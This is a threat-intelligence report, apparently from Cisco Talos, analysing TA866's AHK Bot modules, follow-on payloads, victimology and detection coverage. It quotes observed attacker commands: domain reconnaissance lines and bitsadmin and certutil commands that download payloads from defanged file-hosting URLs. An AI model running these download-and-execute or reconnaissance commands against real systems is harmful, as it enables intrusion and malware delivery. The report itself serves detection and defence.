AHK Bot is a modular malware family that uses AHK scripts to implement various functionality required by the adversary. While there are likely additional scripts that have been developed and deployed by the threat actor, we identified several used in previous intrusion activity as well as in public malware repositories that provide a glimpse into the functionality available with AHK Bot. We assess that these scripts were likely developed by the author of AHK Bot for delivery and use on systems previously infected with AHK Bot.  

These scripts perform the following actions: 

Looper (Persistence and periodic C2 polling). System enumeration. Screenshotter. Domain identification. Secondary C2 connection establishment. Keystroke logging. Credential theft. HVNC deployment and removal. Remote access software deployment and removal. 

AHK Bot is typically delivered to previously infected systems via MSI files which contain the legitimate AutoHotKey binary used to execute AHK scripts, as well as a base AHK script that is referred to as the “looper” in prior reporting. When executed, it creates a subdirectory within C:ProgramData and copies the AutoHotKey binary, as well as the main AHK script into it. It then executes the AHK script and begins polling C2 to wait for additional instructions/scripts to execute.  

Looper 

This script is responsible for establishing persistence for AHK Bot by creating a LNK shortcut within the Startup directory on the system. It also performs periodic polling to an attacker-defined C2 server to retrieve additional AHK scripts for execution on the system.  

As this process repeats each time the system reboots, this provides a robust, modular mechanism for threat actors to further interact with the system as desired.  

System enumeration 

The system and hardware enumeration AHK script uses Windows Management Instrumentation (WMI) to collect information about the hardware and software configuration of the infected system. The following information is collected: 

General system information (OS, hardware devices present, location, etc.). Hard disk configuration. Processor information. RAM configuration. GPU configuration. Networking device information. Firewall, anti-virus and anti-spyware software information. Running process list. 

This information is written to a file (hardware[.]txt) present within the current working directory of the script. This file is then uploaded to the C2 server via HTTP POST requests.  

Screenshotter (deskscreen) 

This AHK script is effectively an alternative implementation of Screenshotter written directly for execution by AHK Bot. It captures screenshots of the infected system and transmits them to the C2 server, like the versions of Screenshotter implemented in JavaScript or Python. Consistent with what was observed in the Python implementation of Screenshotter, this version does not require the use of an external screen capturing utility and the screenshot capture is implemented directly within the AHK script.  

Captured screenshots are transmitted to the attacker’s C2 server, as shown below. 

This version of Screenshotter also features logging capabilities and supports the transmission of status logs to the attacker. 

The code associated with this implementation of Screenshotter also contains comments written in Russian, as shown below. 

The main functionality of the script is comparable with other implementations of Screenshotter seen previously. 

Domain Identification (domain) 

This script is simply used to retrieve the domain membership of an infected system. The domain is retrieved via Windows Management Instrumentation (WMI) and then transmitted to the C2 server via HTTP POST requests as shown below. 

Connect 

The connect script is simply used to establish a connection to an attacker-controlled server and send connection status logs and receive an HTTP response from the server, as shown below. 

Keystroke logging 

This script can log keystrokes on infected systems and send a log of user input to the attacker. First it checks to see if the keylogger process already exists on the system. If not, it attempts to retrieve the AutoHotKey binary from an attacker-controlled server. 

The AHK script has a fully implemented keylogger capability. Collected keystrokes are transmitted via HTTP POST requests. 

The keylogger also features persistence, which is established via the creation of a new Windows shortcut LNK within the StartUp directory on infected systems, allowing the keylogger to be executed each time the system reboots. 

Credential theft (_passwords) 

This script is a browser password stealer that has been implemented as an AHK script. It enables the threat actor to retrieve cached credentials from common browsers that may be installed and in use on infected systems.   

The script begins by setting the download location for the SQLite3 DLL required to parse browser credential stores. It also retrieves the serial number of the C: drive on the system. 

It then checks to determine if the DLL currently exists on the infected system. If not, it attempts to retrieve it from an attacker-controlled server. 

It then attempts to retrieve browsing history and passwords from Internet Explorer, Mozilla Firefox and Chromium-based browsers using multiple methods. 

Status logging and credential information is transmitted to the C2 server via HTTP communications. 

Comments present in the code reference Russian language knowledge base articles.

HVNC deployment and removal 

We have observed two AHK scripts that are used to either deploy or remove hVNC on infected systems. To achieve this, the deployment script attempts to download 7-Zip and hVNC and uses 7-Zip to extract the hVNC files. 

The hVNC application is then executed. Logs associated with the deployment are transmitted to the command and control (C2) via HTTP POST requests.  

The AHK script for hVNC removal simply uses taskkill.exe to terminate the hVNC and 7-Zip processes running on the system. 

Remote access software deployment & removal 

Like what was described for hVNC, two AHK scripts are also used to deploy the commercial Remote Utilities remote access software to infected systems, enabling persistent remote access for the attacker. The scripts attempt to retrieve Remote Utilities from an attacker-controlled server and install it on the system for use to remotely interact with the system.  

Likewise, log messages generated during this process are sent to C2 via HTTP POST requests to provide status updates and alert attackers of any failures that may have been encountered during the deployment. 

Post-compromise activities 

Following successful system compromise, we have observed TA866 conducting various post-compromise activities. In some cases, extended periods of time were observed between initial access and the deployment of follow-on payloads described in the previous section. In many cases, once the actor was on the system they began to conduct information gathering and reconnaissance within the environment, using a combination of built-in and legitimate Windows utilities.  

We have seen execution of a variety of system commands we attribute to the adversary operating on the system. This includes but is not limited to the following:

cmd.exe /c chcp 65001 && net group Domain Computers /domaincmd.exe /c chcp 65001 && set l cmd.exe /c chcp 65001 && nltest /DOMAIN_TRUSTS ipconfig /allwhoami whoami /groups systeminfo 

Other utilities like AdFind and network-scanning applications have been deployed and used. 

In a limited number of cases, we have also observed the deployment of additional malware including: 

Cobalt Strike Rhadamanthys CSharp-Streamer-RAT Resident backdoor Remote access software (TeamViewer, Remote Utilities) 

In the case of Rhadamanthys, we have observed AHK Bot being used to retrieve DLL-based shellcode loaders and execute them on the system to load Rhadamanthys into memory.  

Rhadamanthys is an information stealer that can be used to collect and exfiltrate a variety of sensitive data from infected systems. It is described extensively in prior reporting.  

C:Windowssystem32bitsadmin.exe /transfer
mydownloadjob /download /priority normal hxxps[:]//temp[.]sh/ThuNJ/2[.]dll

We have also observed the use of native Windows binaries, like certutil.exe, being used to retrieve and execute Resident backdoor on systems.  

While not specifically attributed in prior reporting, based on analysis of previous intrusion activity that we attribute to TA866 during the period in which Resident was deployed, we assess with high confidence that TA866 was responsible for its deployment in cases we analyzed. Likewise additional TTPs described in the reporting match those we have observed and attributed to TA866 since 2023. 

certutil -urlcache -split -f hxxps[:]//temp[.]sh/esuJB/resident[.]exe C:programdatares.exe

As described in prior reporting, Resident is a backdoor that can be used to download and execute additional payloads on victim systems. 

Across the intrusion activity analyzed, we observed the threat actor making frequent use of file hosting sites such as hxxps[:]//temp[.]sh for the purpose of payload hosting and delivery. We also noted consistency in the URL structure used by various components in the infection chains to retrieve dependencies needed for them to execute properly.  

Targeting/victimology 

While long-term targeting associated with the distribution campaigns appears indiscriminate, most of the cases where follow on payloads have been observed were in the United States, with additional cases spread across Canada, United Kingdom, Germany, Italy, Austria and the Netherlands. The most affected industry was the manufacturing sector, followed closely by government and financial services, but organizations across many industries have also been affected.  

Links to recent intrusion activity 

We have observed overlaps between historic TA866 intrusion activity and recent WarmCookie/BadSpace campaign activity.  

Most notably, we have observed the following: 

We have observed CSharp-Streamer-RAT delivered as a follow-on payload in TA866 intrusion activity from 2023 as well as WarmCookie intrusion activity in 2024. The C2 servers used by both CSharp-Streamer-RAT samples shared SSL characteristics that appear to have been programmatically generated in a consistent manner. Leveraging internet census data, we identified a cluster of four total C2 servers with SSL certificates matching this algorithm. Following an analysis of both Resident backdoor and WarmCookie, we assess that the same threat actor likely authored both. In several cases, core functionality is implemented in a consistent manner across both Resident backdoor samples and recent WarmCookie samples.  

Based on our analysis, we assess that TA866 is likely associated with both clusters of malicious activity.  

Prior reporting also indicates that the CSharp-Streamer-RAT C2 server (109[.]236[.]80[.]191) observed in previous intrusion activity that we attribute to TA866 has also been seen in intrusion activity linked to IcedID and ALPHV ransomware. 

In several cases, we observed the repeated deployment of Cobalt Strike beacons following successful compromise of organizational networks. We have observed overlaps in the distribution infrastructure used and the cluster of infrastructure associated with ShadowSyndicate in prior reporting. 

Mitre ATT&CK Techniques 

Reconnaissance  

T1589.002 Gather Victim Identity Information: Email Addresses  

Resource Development  

T1586.002 Compromise Accounts: Email Accounts  T1608.006 Stage Capabilities: SEO Poisoning  T2583.008 Acquire Infrastructure: Malvertising  

Initial Access  

T1566 Phishing  T1566.001 Spearphishing Attachment  T1566.002 Spearphishing Link  

Execution  

T1059.001 Command and Scripting Interpreter: PowerShell  T1059.003 Command and Scripting Interpreter: Windows Command Shell  T1047 Windows Management Instrumentation  

Persistence  

T1574.002 Hijack Execution Flow: DLL Side-Loading  

Defense Evasion  

T1218.007 System Binary Proxy Execution: Msiexec  

Discovery  

T1069.002 Permission Groups Discovery: Domain Groups  T1016 System Network Configuration Discovery  T1482 Domain Trust Discovery  T1018 Remote System Discovery  T1057 Process Discovery  T1007 System Service Discovery  T1518.001 Software Discovery: Security Software Discovery  T1124 System Time Discovery  T1082 System Information Discovery  T1033 System Owner / User Discovery  

Command and Control  

T1105 Ingress Tool Transfer  T1219 Remote Access Software  T1071.001 Application Layer Protocol: Web Protocols 

Coverage 

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The following Snort rule(s) have been developed to detect activity associated with this malicious activity.  

Snort 2 SIDs: 64139, 64140, 64141, 64142, 64143, 64144, 64145, 64146, 64147, 64148, 64149, 64150, 64151, 64152, 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162.   Snort 3 SIDs: 64153, 64154, 64155, 64156, 64157, 64158, 64159, 64160, 64161, 64162, 301044, 301045, 301046, 301047, 301048, 301049, 301050.  

The following ClamAV signatures have been developed to detect activity associated with this malicious activity.  

Js.Downloader.Agent-10022279-0  Vbs.Downloader.Agent-10022291-0  Win.Trojan.WasabiSeed-10022304-0  Js.Trojan.Screenshotter-10022306-0  Js.Trojan.Agent-10022307-0  Win.Trojan.Lazy-10022308-0  Win.Trojan.Screenshotter-10022309-0  PUA.Win.Tool.NetPing-10022493-0  Win.Malware.CobaltStrike-10022494-0  PUA.Win.Tool.AutoHotKey-10022305-1  PUA.Win.Tool.RemoteUtilities-9869515-0  PUA.Win.Tool.AdFind-9962378-0   Txt.Downloader.AHKBot-10024463-0  Ps1.Malware.CobaltStrike-10024466-0  Win.Infostealer.Rhadamanthys-10024467-0  Txt.Infostealer.Rhadamanthys-10024468-0  Win.Backdoor.Agent-10025011-0  Vbs.Trojan.Screenshotter-10025015-0  Win.Malware.Warmcookie-10036688-0 Win.Malware.CSsharpStreamer-10036641-0 

Indicators of Compromise 

Indicators of compromise associated with TA866 activity can be found in our GitHub repository here. 

Cisco Talos Blog – ​Read More